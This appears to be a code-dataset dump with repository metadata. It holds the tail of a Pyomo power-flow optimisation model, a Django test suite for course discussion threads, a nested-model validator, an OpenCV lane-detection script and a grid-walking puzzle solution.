m.b63 = Var(within=Binary,bounds=(0,1),initialize=0)
m.x64 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x65 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x66 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x67 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x68 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x69 = Var(within=Reals,bounds=(None,None),initialize=0)
m.obj = Objective(expr=1100*m.x64**2 + 500*m.x64 + 850*m.x65**2 + 120*m.x65 + 1225*m.x66**2 + 100*m.x66
+ 1085, sense=minimize)
m.c2 = Constraint(expr=-17.0648464163823*m.x3*m.x6*sin(m.x48 - m.x51)*m.b55 + m.x10 == 0)
m.c3 = Constraint(expr=-17.0648464163823*m.x6*m.x3*sin(m.x51 - m.x48)*m.b55 + m.x11 == 0)
m.c4 = Constraint(expr=-(1.61712247324614*m.x7**2 - 1.61712247324614*m.x7*m.x8*cos(m.x52 - m.x53) + 13.6979785969084*
m.x7*m.x8*sin(m.x52 - m.x53))*m.b56 + m.x12 == 0)
m.c5 = Constraint(expr=-(1.61712247324614*m.x8**2 - 1.61712247324614*m.x8*m.x7*cos(m.x53 - m.x52) + 13.6979785969084*
m.x8*m.x7*sin(m.x53 - m.x52))*m.b56 + m.x13 == 0)
m.c6 = Constraint(expr=-(1.28200913842411*m.x5**2 - 1.28200913842411*m.x5*m.x6*cos(m.x50 - m.x51) + 5.58824496236153*
m.x5*m.x6*sin(m.x50 - m.x51))*m.b57 + m.x14 == 0)
m.c7 = Constraint(expr=-(1.28200913842411*m.x6**2 - 1.28200913842411*m.x6*m.x5*cos(m.x51 - m.x50) + 5.58824496236153*
m.x6*m.x5*sin(m.x51 - m.x50))*m.b57 + m.x15 == 0)
m.c8 = Constraint(expr=-(1.1550874808901*m.x6**2 - 1.1550874808901*m.x6*m.x7*cos(m.x51 - m.x52) + 9.78427042636317*m.x6*
m.x7*sin(m.x51 - m.x52))*m.b58 + m.x16 == 0)
m.c9 = Constraint(expr=-(1.1550874808901*m.x7**2 - 1.1550874808901*m.x7*m.x6*cos(m.x52 - m.x51) + 9.78427042636317*m.x7*
m.x6*sin(m.x52 - m.x51))*m.b58 + m.x17 == 0)
m.c10 = Constraint(expr=-16*m.x8*m.x2*sin(m.x53 - m.x47)*m.b59 + m.x18 == 0)
m.c11 = Constraint(expr=-16*m.x2*m.x8*sin(m.x47 - m.x53)*m.b59 + m.x19 == 0)
m.c12 = Constraint(expr=-(1.94219124871473*m.x4**2 - 1.94219124871473*m.x4*m.x5*cos(m.x49 - m.x50) + 10.5106820518679*
m.x4*m.x5*sin(m.x49 - m.x50))*m.b60 + m.x20 == 0)
m.c13 = Constraint(expr=-(1.94219124871473*m.x5**2 - 1.94219124871473*m.x5*m.x4*cos(m.x50 - m.x49) + 10.5106820518679*
m.x5*m.x4*sin(m.x50 - m.x49))*m.b60 + m.x21 == 0)
m.c14 = Constraint(expr=-17.3611111111111*m.x1*m.x4*sin(m.x46 - m.x49)*m.b61 + m.x22 == 0)
m.c15 = Constraint(expr=-17.3611111111111*m.x4*m.x1*sin(m.x49 - m.x46)*m.b61 + m.x23 == 0)
m.c16 = Constraint(expr=-(1.36518771331058*m.x9**2 - 1.36518771331058*m.x9*m.x4*cos(m.x54 - m.x49) + 11.6040955631399*
m.x9*m.x4*sin(m.x54 - m.x49))*m.b62 + m.x24 == 0)
m.c17 = Constraint(expr=-(1.36518771331058*m.x4**2 - 1.36518771331058*m.x4*m.x9*cos(m.x49 - m.x54) + 11.6040955631399*
m.x4*m.x9*sin(m.x49 - m.x54))*m.b62 + m.x25 == 0)
m.c18 = Constraint(expr=-(1.18760437929115*m.x8**2 - 1.18760437929115*m.x8*m.x9*cos(m.x53 - m.x54) + 5.97513453330859*
m.x8*m.x9*sin(m.x53 - m.x54))*m.b63 + m.x26 == 0)
m.c19 = Constraint(expr=-(1.18760437929115*m.x9**2 - 1.18760437929115*m.x9*m.x8*cos(m.x54 - m.x53) + 5.97513453330859*
m.x9*m.x8*sin(m.x54 - m.x53))*m.b63 + m.x27 == 0)
m.c20 = Constraint(expr=-(17.0648464163823*m.x3**2 - 17.0648464163823*m.x3*m.x6*cos(m.x48 - m.x51))*m.b55 + m.x28 == 0)
m.c21 = Constraint(expr=-(17.0648464163823*m.x6**2 - 17.0648464163823*m.x6*m.x3*cos(m.x51 - m.x48))*m.b55 + m.x29 == 0)
m.c22 = Constraint(expr=-(13.6234785969084*m.x7**2 - 13.6979785969084*m.x7*m.x8*cos(m.x52 - m.x53) - 1.61712247324614*
m.x7*m.x8*sin(m.x52 - m.x53))*m.b56 + m.x30 == 0)
m.c23 = Constraint(expr=-(13.6234785969084*m.x8**2 - 13.6979785969084*m.x8*m.x7*cos(m.x53 - m.x52) - 1.61712247324614*
m.x8*m.x7*sin(m.x53 - m.x52))*m.b56 + m.x31 == 0)
m.c24 = Constraint(expr=-(5.40924496236153*m.x5**2 - 5.58824496236153*m.x5*m.x6*cos(m.x50 - m.x51) - 1.28200913842411*
m.x5*m.x6*sin(m.x50 - m.x51))*m.b57 + m.x32 == 0)
m.c25 = Constraint(expr=-(5.40924496236153*m.x6**2 - 5.58824496236153*m.x6*m.x5*cos(m.x51 - m.x50) - 1.28200913842411*
m.x6*m.x5*sin(m.x51 - m.x50))*m.b57 + m.x33 == 0)
m.c26 = Constraint(expr=-(9.67977042636317*m.x6**2 - 9.78427042636317*m.x6*m.x7*cos(m.x51 - m.x52) - 1.1550874808901*
m.x6*m.x7*sin(m.x51 - m.x52))*m.b58 + m.x34 == 0)
m.c27 = Constraint(expr=-(9.67977042636317*m.x7**2 - 9.78427042636317*m.x7*m.x6*cos(m.x52 - m.x51) - 1.1550874808901*
m.x7*m.x6*sin(m.x52 - m.x51))*m.b58 + m.x35 == 0)
m.c28 = Constraint(expr=-(16*m.x8**2 - 16*m.x8*m.x2*cos(m.x53 - m.x47))*m.b59 + m.x36 == 0)
m.c29 = Constraint(expr=-(16*m.x2**2 - 16*m.x2*m.x8*cos(m.x47 - m.x53))*m.b59 + m.x37 == 0)
m.c30 = Constraint(expr=-(10.4316820518679*m.x4**2 - 10.5106820518679*m.x4*m.x5*cos(m.x49 - m.x50) - 1.94219124871473*
m.x4*m.x5*sin(m.x49 - m.x50))*m.b60 + m.x38 == 0)
m.c31 = Constraint(expr=-(10.4316820518679*m.x5**2 - 10.5106820518679*m.x5*m.x4*cos(m.x50 - m.x49) - 1.94219124871473*
m.x5*m.x4*sin(m.x50 - m.x49))*m.b60 + m.x39 == 0)
m.c32 = Constraint(expr=-(17.3611111111111*m.x1**2 - 17.3611111111111*m.x1*m.x4*cos(m.x46 - m.x49))*m.b61 + m.x40 == 0)
m.c33 = Constraint(expr=-(17.3611111111111*m.x4**2 - 17.3611111111111*m.x4*m.x1*cos(m.x49 - m.x46))*m.b61 + m.x41 == 0)
m.c34 = Constraint(expr=-(11.5160955631399*m.x9**2 - 11.6040955631399*m.x9*m.x4*cos(m.x54 - m.x49) - 1.36518771331058*
m.x9*m.x4*sin(m.x54 - m.x49))*m.b62 + m.x42 == 0)
m.c35 = Constraint(expr=-(11.5160955631399*m.x4**2 - 11.6040955631399*m.x4*m.x9*cos(m.x49 - m.x54) - 1.36518771331058*
m.x4*m.x9*sin(m.x49 - m.x54))*m.b62 + m.x43 == 0)
m.c36 = Constraint(expr=-(5.82213453330859*m.x8**2 - 5.97513453330859*m.x8*m.x9*cos(m.x53 - m.x54) - 1.18760437929115*
m.x8*m.x9*sin(m.x53 - m.x54))*m.b63 + m.x44 == 0)
m.c37 = Constraint(expr=-(5.82213453330859*m.x9**2 - 5.97513453330859*m.x9*m.x8*cos(m.x54 - m.x53) - 1.18760437929115*
m.x9*m.x8*sin(m.x54 - m.x53))*m.b63 + m.x45 == 0)
m.c38 = Constraint(expr=m.x10**2 + m.x28**2 <= 9)
m.c39 = Constraint(expr=m.x11**2 + m.x29**2 <= 9)
m.c40 = Constraint(expr=m.x12**2 + m.x30**2 <= 6.25)
m.c41 = Constraint(expr=m.x13**2 + m.x31**2 <= 6.25)
m.c42 = Constraint(expr=m.x14**2 + m.x32**2 <= 2.25)
m.c43 = Constraint(expr=m.x15**2 + m.x33**2 <= 2.25)
m.c44 = Constraint(expr=m.x16**2 + m.x34**2 <= 2.25)
m.c45 = Constraint(expr=m.x17**2 + m.x35**2 <= 2.25)
m.c46 = Constraint(expr=m.x18**2 + m.x36**2 <= 6.25)
m.c47 = Constraint(expr=m.x19**2 + m.x37**2 <= 6.25)
m.c48 = Constraint(expr=m.x20**2 + m.x38**2 <= 6.25)
m.c49 = Constraint(expr=m.x21**2 + m.x39**2 <= 6.25)
m.c50 = Constraint(expr=m.x22**2 + m.x40**2 <= 6.25)
m.c51 = Constraint(expr=m.x23**2 + m.x41**2 <= 6.25)
m.c52 = Constraint(expr=m.x24**2 + m.x42**2 <= 6.25)
m.c53 = Constraint(expr=m.x25**2 + m.x43**2 <= 6.25)
m.c54 = Constraint(expr=m.x26**2 + m.x44**2 <= 6.25)
m.c55 = Constraint(expr=m.x27**2 + m.x45**2 <= 6.25)
m.c56 = Constraint(expr= m.x64 <= 2.5)
m.c57 = Constraint(expr= m.x65 <= 3)
m.c58 = Constraint(expr= m.x66 <= 2.7)
m.c59 = Constraint(expr= m.x64 >= 0.1)
m.c60 = Constraint(expr= m.x65 >= 0.1)
m.c61 = Constraint(expr= m.x66 >= 0.1)
m.c62 = Constraint(expr= m.x67 <= 3)
m.c63 = Constraint(expr= m.x68 <= 3)
m.c64 = Constraint(expr= m.x69 <= 3)
m.c65 = Constraint(expr= m.x67 >= -3)
m.c66 = Constraint(expr= m.x68 >= -3)
m.c67 = Constraint(expr= m.x69 >= -3)
m.c68 = Constraint(expr= m.x1 <= 1.1)
m.c69 = Constraint(expr= m.x2 <= 1.1)
m.c70 = Constraint(expr= m.x3 <= 1.1)
m.c71 = Constraint(expr= m.x4 <= 1.1)
m.c72 = Constraint(expr= m.x5 <= 1.1)
m.c73 = Constraint(expr= m.x6 <= 1.1)
m.c74 = Constraint(expr= m.x7 <= 1.1)
m.c75 = Constraint(expr= m.x8 <= 1.1)
m.c76 = Constraint(expr= m.x9 <= 1.1)
m.c77 = Constraint(expr= m.x1 >= 0.9)
m.c78 = Constraint(expr= m.x2 >= 0.9)
m.c79 = Constraint(expr= m.x3 >= 0.9)
m.c80 = Constraint(expr= m.x4 >= 0.9)
m.c81 = Constraint(expr= m.x5 >= 0.9)
m.c82 = Constraint(expr= m.x6 >= 0.9)
m.c83 = Constraint(expr= m.x7 >= 0.9)
m.c84 = Constraint(expr= m.x8 >= 0.9)
m.c85 = Constraint(expr= m.x9 >= 0.9)
m.c86 = Constraint(expr= m.x48 - m.x51 >= -0.26)
m.c87 = Constraint(expr= - m.x48 + m.x51 >= -0.26)
m.c88 = Constraint(expr= m.x52 - m.x53 >= -0.26)
m.c89 = Constraint(expr= - m.x52 + m.x53 >= -0.26)
m.c90 = Constraint(expr= m.x50 - m.x51 >= -0.26)
m.c91 = Constraint(expr= - m.x50 + m.x51 >= -0.26)
m.c92 = Constraint(expr= m.x51 - m.x52 >= -0.26)
m.c93 = Constraint(expr= - m.x51 + m.x52 >= -0.26)
m.c94 = Constraint(expr= - m.x47 + m.x53 >= -0.26)
m.c95 = Constraint(expr= m.x47 - m.x53 >= -0.26)
m.c96 = Constraint(expr= m.x49 - m.x50 >= -0.26)
m.c97 = Constraint(expr= - m.x49 + m.x50 >= -0.26)
m.c98 = Constraint(expr= m.x46 - m.x49 >= -0.26)
m.c99 = Constraint(expr= - m.x46 + m.x49 >= -0.26)
m.c100 = Constraint(expr= - m.x49 + m.x54 >= -0.26)
m.c101 = Constraint(expr= m.x49 - m.x54 >= -0.26)
m.c102 = Constraint(expr= m.x53 - m.x54 >= -0.26)
m.c103 = Constraint(expr= - m.x53 + m.x54 >= -0.26)
m.c104 = Constraint(expr= m.x48 - m.x51 <= 0.26)
m.c105 = Constraint(expr= - m.x48 + m.x51 <= 0.26)
m.c106 = Constraint(expr= m.x52 - m.x53 <= 0.26)
m.c107 = Constraint(expr= - m.x52 + m.x53 <= 0.26)
m.c108 = Constraint(expr= m.x50 - m.x51 <= 0.26)
m.c109 = Constraint(expr= - m.x50 + m.x51 <= 0.26)
m.c110 = Constraint(expr= m.x51 - m.x52 <= 0.26)
m.c111 = Constraint(expr= - m.x51 + m.x52 <= 0.26)
m.c112 = Constraint(expr= - m.x47 + m.x53 <= 0.26)
m.c113 = Constraint(expr= m.x47 - m.x53 <= 0.26)
m.c114 = Constraint(expr= m.x49 - m.x50 <= 0.26)
m.c115 = Constraint(expr= - m.x49 + m.x50 <= 0.26)
m.c116 = Constraint(expr= m.x46 - m.x49 <= 0.26)
m.c117 = Constraint(expr= - m.x46 + m.x49 <= 0.26)
m.c118 = Constraint(expr= - m.x49 + m.x54 <= 0.26)
m.c119 = Constraint(expr= m.x49 - m.x54 <= 0.26)
m.c120 = Constraint(expr= m.x53 - m.x54 <= 0.26)
m.c121 = Constraint(expr= - m.x53 + m.x54 <= 0.26)
m.c122 = Constraint(expr= m.x46 == 0)
m.c123 = Constraint(expr= m.x22 - m.x64 == 0)
m.c124 = Constraint(expr= m.x19 - m.x65 == 0)
m.c125 = Constraint(expr= m.x10 - m.x66 == 0)
m.c126 = Constraint(expr= m.x40 - m.x67 == 0)
m.c127 = Constraint(expr= m.x37 - m.x68 == 0)
m.c128 = Constraint(expr= m.x28 - m.x69 == 0)
m.c129 = Constraint(expr= m.x20 + m.x23 + m.x25 == 0)
m.c130 = Constraint(expr= m.x14 + m.x21 == -0.9)
m.c131 = Constraint(expr= m.x11 + m.x15 + m.x16 == 0)
m.c132 = Constraint(expr= m.x12 + m.x17 == -1)
m.c133 = Constraint(expr= m.x13 + m.x18 + m.x26 == 0)
m.c134 = Constraint(expr= m.x24 + m.x27 == -1.25)
m.c135 = Constraint(expr= m.x38 + m.x41 + m.x43 == 0)
m.c136 = Constraint(expr= m.x32 + m.x39 == -0.3)
m.c137 = Constraint(expr= m.x29 + m.x33 + m.x34 == 0)
m.c138 = Constraint(expr= m.x30 + m.x35 == -0.35)
m.c139 = Constraint(expr= m.x31 + m.x36 + m.x44 == 0)
m.c140 = Constraint(expr= m.x42 + m.x45 == -0.5)
| 0 | 0 | 0 |
4ee8509f03c8f5ebeb21b108dd00b217afcaa269 | 8,819 | py | Python | academicstoday_project/teacher/tests/test_discussion.py | LeeDoona/EasyGrading | 8a3b7a95e328a5b710bd98934dcde7556731bd72 | [
"Apache-2.0"
] | 146 | 2017-02-04T11:14:50.000Z | 2021-12-30T20:54:50.000Z | academicstoday_project/teacher/tests/test_discussion.py | LeeDoona/EasyGrading | 8a3b7a95e328a5b710bd98934dcde7556731bd72 | [
"Apache-2.0"
] | 139 | 2015-02-21T21:40:34.000Z | 2016-02-20T13:34:25.000Z | academicstoday_project/teacher/tests/test_discussion.py | topsit143/acda | c2a20ffd1dcf8668d1fe401d114d32d9e686f1fd | [
"Apache-2.0"
] | 88 | 2017-01-20T20:32:44.000Z | 2022-02-07T05:32:44.000Z | # Django & Python
from django.core.urlresolvers import resolve
from django.http import HttpRequest
from django.http import QueryDict
from django.test import TestCase
from django.test import Client
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
import json
from account.models import Teacher
from registrar.models import Course
from registrar.models import CourseDiscussionPost
from registrar.models import CourseDiscussionThread
from teacher.views import discussion
# Contants
TEST_USER_EMAIL = "ledo@gah.com"
TEST_USER_USERNAME = "Ledo"
TEST_USER_PASSWORD = "ContinentalUnion"
TEST_USER_EMAIL2 = "whalesquid@hideauze.com"
TEST_USER_USERNAME2 = "whalesquid"
TEST_USER_PASSWORD2 = "Evolvers"
# Notes:
# https://docs.djangoproject.com/en/1.7/topics/testing/tools/#assertions
# Create your tests here. | 39.022124 | 86 | 0.659372 | # Django & Python
from django.core.urlresolvers import resolve
from django.http import HttpRequest
from django.http import QueryDict
from django.test import TestCase
from django.test import Client
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
import json
from account.models import Teacher
from registrar.models import Course
from registrar.models import CourseDiscussionPost
from registrar.models import CourseDiscussionThread
from teacher.views import discussion
# Contants
TEST_USER_EMAIL = "ledo@gah.com"
TEST_USER_USERNAME = "Ledo"
TEST_USER_PASSWORD = "ContinentalUnion"
TEST_USER_EMAIL2 = "whalesquid@hideauze.com"
TEST_USER_USERNAME2 = "whalesquid"
TEST_USER_PASSWORD2 = "Evolvers"
# Notes:
# https://docs.djangoproject.com/en/1.7/topics/testing/tools/#assertions
# Create your tests here.
class DiscussionTestCase(TestCase):
def tearDown(self):
courses = Course.objects.all()
for course in courses:
course.delete()
User.objects.all().delete()
def setUp(self):
# Create our Trudy user.
User.objects.create_user(
email=TEST_USER_EMAIL2,
username=TEST_USER_USERNAME2,
password=TEST_USER_PASSWORD2
)
user = User.objects.get(email=TEST_USER_EMAIL2)
teacher = Teacher.objects.create(user=user)
# Create our Teacher.
User.objects.create_user(
email=TEST_USER_EMAIL,
username=TEST_USER_USERNAME,
password=TEST_USER_PASSWORD
)
user = User.objects.get(email=TEST_USER_EMAIL)
teacher = Teacher.objects.create(user=user)
# Create a test course
Course.objects.create(
id=1,
title="Comics Book Course",
sub_title="The definitive course on comics!",
category="",
teacher=teacher,
)
course = Course.objects.get(id=1)
user = User.objects.get(email=TEST_USER_EMAIL)
CourseDiscussionThread.objects.create(
thread_id=1,
title="Glory...",
text="Glory to the Galactic Alliance of Humankind!",
user=user,
course=course,
)
CourseDiscussionPost.objects.create(
post_id=1,
user=user,
title='Hideazue...',
text='We will spread the domain of the living throughout the universe!'
)
thread = CourseDiscussionThread.objects.get(thread_id=1)
post = CourseDiscussionPost.objects.get(post_id=1)
thread.posts.add(post)
def get_logged_in_client(self):
client = Client()
client.login(
username=TEST_USER_USERNAME,
password=TEST_USER_PASSWORD
)
return client
def get_logged_in_trudy_client(self):
client = Client()
client.login(
username=TEST_USER_USERNAME2,
password=TEST_USER_PASSWORD2
)
return client
def test_url_resolves_to_discussion_page_view(self):
found = resolve('/teacher/course/1/discussion')
self.assertEqual(found.func, discussion.discussion_page)
def test_discussion_page_without_thread(self):
CourseDiscussionThread.objects.get(
thread_id=1
).delete()
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/discussion')
self.assertEqual(response.status_code, 200)
self.assertIn(b'Comics Book Course',response.content)
def test_discussion_page_with_thread(self):
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/discussion')
self.assertEqual(response.status_code, 200)
self.assertIn(b'Comics Book Course',response.content)
self.assertIn(b'ajax_discussions_table',response.content)
def test_threads_table_without_thread(self):
CourseDiscussionThread.objects.get(
thread_id=1
).delete()
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/discussions_table')
self.assertEqual(response.status_code, 200)
def test_threads_table_with_thread(self):
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/discussions_table')
self.assertEqual(response.status_code, 200)
self.assertIn(b'Glory...',response.content)
def test_new_thread_modal(self):
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/new_thread')
self.assertEqual(response.status_code, 200)
self.assertIn(b'new_thread_modal',response.content)
def test_insert_thread(self):
CourseDiscussionThread.objects.get(
thread_id=1
).delete()
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/insert_thread',{
'title': 'Hideazue...',
'text': 'We will spread the domain of the living throughout the universe!'
}, **kwargs)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(response.status_code, 200)
self.assertEqual(array['message'], 'submitted')
self.assertEqual(array['status'], 'success')
def test_delete_thread_with_thread_and_correct_user(self):
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/delete_thread',{
'thread_id': 1,
}, **kwargs)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['status'], 'success')
self.assertEqual(array['message'], 'thread was deleted')
def test_delete_thread_with_empty(self):
CourseDiscussionThread.objects.all().delete()
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/delete_thread',{
'thread_id': 1,
}, **kwargs)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['status'], 'failed')
self.assertEqual(array['message'], 'record does not exist')
def test_delete_thread_with_thread_and_incorrect_user(self):
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_trudy_client()
response = client.post('/teacher/course/1/delete_thread',{
'thread_id': 1,
}, **kwargs)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['status'], 'failed')
self.assertEqual(array['message'], 'unauthorized deletion')
def test_url_resolves_to_posts_page_view(self):
found = resolve('/teacher/course/1/thread/1')
self.assertEqual(found.func, discussion.posts_page)
def test_posts_page(self):
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/thread/1')
self.assertEqual(response.status_code, 200)
self.assertIn(b'Comics Book Course',response.content)
self.assertIn(b'ajax_discussion_table',response.content)
def test_post_table(self):
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/thread/1/posts_table')
self.assertEqual(response.status_code, 200)
self.assertIn(b'Hideazue...',response.content)
def test_new_post_modal(self):
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/thread/1/new_post')
self.assertEqual(response.status_code, 200)
self.assertIn(b'new_post_modal',response.content)
def test_insert_post(self):
CourseDiscussionPost.objects.get(
post_id=1
).delete()
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/thread/1/insert_post',{
'title': 'Hideazue...',
'text': 'We will spread the domain of the living throughout the universe!'
}, **kwargs)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(response.status_code, 200)
self.assertEqual(array['message'], 'submitted')
self.assertEqual(array['status'], 'success') | 7,335 | 14 | 554 |
d146f86fe4b08ed4d48239b293aa2f2b80b2c8eb | 1,239 | py | Python | rebase/validators/nested_validator.py | dciccale/rebase | e218bde43a31cb8b269733d262e978e4872f969f | [
"Apache-2.0"
] | 15 | 2018-07-06T13:40:27.000Z | 2021-08-05T21:33:31.000Z | rebase/validators/nested_validator.py | dciccale/rebase | e218bde43a31cb8b269733d262e978e4872f969f | [
"Apache-2.0"
] | 1 | 2021-04-01T10:24:32.000Z | 2021-04-01T10:24:32.000Z | rebase/validators/nested_validator.py | dciccale/rebase | e218bde43a31cb8b269733d262e978e4872f969f | [
"Apache-2.0"
] | 5 | 2018-07-06T13:40:31.000Z | 2020-10-28T19:51:03.000Z | """This file is part of the trivago/rebase library.
# Copyright (c) 2018 trivago N.V.
# License: Apache 2.0
# Source: https://github.com/trivago/rebase
# Version: 1.2.2
# Python Version: 3.6
# Author: Yuv Joodhisty <yuvrajsingh.joodhisty@trivago.com>
"""
from rebase.core import Model, Validator
| 29.5 | 68 | 0.572236 | """This file is part of the trivago/rebase library.
# Copyright (c) 2018 trivago N.V.
# License: Apache 2.0
# Source: https://github.com/trivago/rebase
# Version: 1.2.2
# Python Version: 3.6
# Author: Yuv Joodhisty <yuvrajsingh.joodhisty@trivago.com>
"""
from rebase.core import Model, Validator
class NestedValidator(Validator):
def properties(self):
return {
**super().properties(),
'required': True,
}
def validate(self, value):
if not super().validate(value):
return False
is_valid = True
if isinstance(value, Model) and not value.validate():
is_valid = False
self.errors.append(value.get_errors())
elif isinstance(value, dict):
for k, v in value.items():
if isinstance(v, Model) and not v.validate():
is_valid = False
self.errors.append({k: v.get_errors()})
elif isinstance(value, list) or isinstance(value, set):
for v in value:
if isinstance(v, Model) and not v.validate():
is_valid = False
self.errors.append({v.get_id(): v.get_errors()})
return is_valid
| 852 | 12 | 76 |
05b958c3e5ef7b84bf7c6a9d4484c6eb9da5ea59 | 1,071 | py | Python | TemasC/try.py | axsaenz/Alvin | 9afa5a5a8ad3e7d703818d867df3630042293d49 | [
"MIT"
] | null | null | null | TemasC/try.py | axsaenz/Alvin | 9afa5a5a8ad3e7d703818d867df3630042293d49 | [
"MIT"
] | null | null | null | TemasC/try.py | axsaenz/Alvin | 9afa5a5a8ad3e7d703818d867df3630042293d49 | [
"MIT"
] | null | null | null | import numpy as np
import cv2
import camera
import images
objCamera = camera.Camera(camera_port = 1, resolution = 1)
img = objCamera.take_photo()
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
cv2.imshow('Gray', gray)
cv2.waitKey(0)
gray_blur = images.gaussian(gray, 11)
cv2.imshow('Gaussian', gray_blur)
cv2.waitKey(0)
gray_canny = images.canny(gray_blur, 100, 130)
cv2.imshow('Canny', gray_canny)
cv2.waitKey(0)
imshape = img.shape
vertix0 = (0, imshape[0])
vertix1 = (0, int(333 * imshape[0] / 480))
vertix2 = (int(200 * imshape[1] / 640), int(65 * imshape[0] / 480))
vertix3 = (int(430 * imshape[1] / 640), int(65 * imshape[0] / 480))
vertix4 = (imshape[1], int(333 * imshape[0] / 480))
vertix5 = (imshape[1], imshape[0])
vertices = np.array([[vertix0, vertix1, vertix2, vertix3, vertix4, vertix5]], dtype=np.int32)
region = images.region_of_interest(gray_canny, vertices)
cv2.imshow('Region', region)
cv2.waitKey(0)
hough = images.hough(img, region, 0, 0, 120)
cv2.imshow('Hough', hough)
cv2.waitKey(0)
camera.save_photo('hough', hough)
cv2.destroyAllWindows() | 27.461538 | 93 | 0.709617 | import numpy as np
import cv2
import camera
import images
objCamera = camera.Camera(camera_port = 1, resolution = 1)
img = objCamera.take_photo()
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
cv2.imshow('Gray', gray)
cv2.waitKey(0)
gray_blur = images.gaussian(gray, 11)
cv2.imshow('Gaussian', gray_blur)
cv2.waitKey(0)
gray_canny = images.canny(gray_blur, 100, 130)
cv2.imshow('Canny', gray_canny)
cv2.waitKey(0)
imshape = img.shape
vertix0 = (0, imshape[0])
vertix1 = (0, int(333 * imshape[0] / 480))
vertix2 = (int(200 * imshape[1] / 640), int(65 * imshape[0] / 480))
vertix3 = (int(430 * imshape[1] / 640), int(65 * imshape[0] / 480))
vertix4 = (imshape[1], int(333 * imshape[0] / 480))
vertix5 = (imshape[1], imshape[0])
vertices = np.array([[vertix0, vertix1, vertix2, vertix3, vertix4, vertix5]], dtype=np.int32)
region = images.region_of_interest(gray_canny, vertices)
cv2.imshow('Region', region)
cv2.waitKey(0)
hough = images.hough(img, region, 0, 0, 120)
cv2.imshow('Hough', hough)
cv2.waitKey(0)
camera.save_photo('hough', hough)
cv2.destroyAllWindows() | 0 | 0 | 0 |
7f37e9263c431b73f9c514e50ece1dc69d7a3167 | 1,591 | py | Python | 03-Multidimensional-lists/alice_in_wonderland.py | nmoskova/Python-advanced | 007f496e868aa151e39d79446b055e76ffb2db95 | [
"MIT"
] | null | null | null | 03-Multidimensional-lists/alice_in_wonderland.py | nmoskova/Python-advanced | 007f496e868aa151e39d79446b055e76ffb2db95 | [
"MIT"
] | null | null | null | 03-Multidimensional-lists/alice_in_wonderland.py | nmoskova/Python-advanced | 007f496e868aa151e39d79446b055e76ffb2db95 | [
"MIT"
] | null | null | null |
size = int(input())
matrix = []
alice_row, alice_col = 0, 0
for r in range(size):
matrix.append(input().split())
for c in range(size):
if matrix[r][c] == "A":
alice_row, alice_col = r, c
matrix[alice_row][alice_col] = '*'
alice_collected_enough_tea = False
tea = 0
current_row, current_col = alice_row, alice_col
while True:
command = input()
current_row, current_col = get_position(command, current_row, current_col)
if not check_valid_index(current_row, current_col, size):
break
if matrix[current_row][current_col] == "R":
matrix[current_row][current_col] = "*"
break
elif matrix[current_row][current_col] == ".":
matrix[current_row][current_col] = "*"
continue
elif matrix[current_row][current_col] == "*":
continue
else:
tea += int(matrix[current_row][current_col])
matrix[current_row][current_col] = "*"
if tea >= 10:
alice_collected_enough_tea = True
break
if alice_collected_enough_tea:
print("She did it! She went to the party.")
else:
print("Alice didn't make it to the tea party.")
[print(' '.join(row)) for row in matrix] | 26.966102 | 78 | 0.623507 | def get_position(command: str, row: int, col: int):
if command == "up":
return row - 1, col
elif command == "down":
return row + 1, col
elif command == "left":
return row, col - 1
elif command == "right":
return row, col + 1
def check_valid_index(next_row, next_col, size):
return next_row in range(size) and next_col in range(size)
size = int(input())
matrix = []
alice_row, alice_col = 0, 0
for r in range(size):
matrix.append(input().split())
for c in range(size):
if matrix[r][c] == "A":
alice_row, alice_col = r, c
matrix[alice_row][alice_col] = '*'
alice_collected_enough_tea = False
tea = 0
current_row, current_col = alice_row, alice_col
while True:
command = input()
current_row, current_col = get_position(command, current_row, current_col)
if not check_valid_index(current_row, current_col, size):
break
if matrix[current_row][current_col] == "R":
matrix[current_row][current_col] = "*"
break
elif matrix[current_row][current_col] == ".":
matrix[current_row][current_col] = "*"
continue
elif matrix[current_row][current_col] == "*":
continue
else:
tea += int(matrix[current_row][current_col])
matrix[current_row][current_col] = "*"
if tea >= 10:
alice_collected_enough_tea = True
break
if alice_collected_enough_tea:
print("She did it! She went to the party.")
else:
print("Alice didn't make it to the tea party.")
[print(' '.join(row)) for row in matrix] | 341 | 0 | 45 |
e87e4331c329b0e493efb43ebb9bed1ab2eadf77 | 349 | py | Python | common/helpers.py | gtsiokos/diogenis | c83d4dac26df68bbbf897c48a5552ea9c9ede9c2 | [
"BSD-3-Clause"
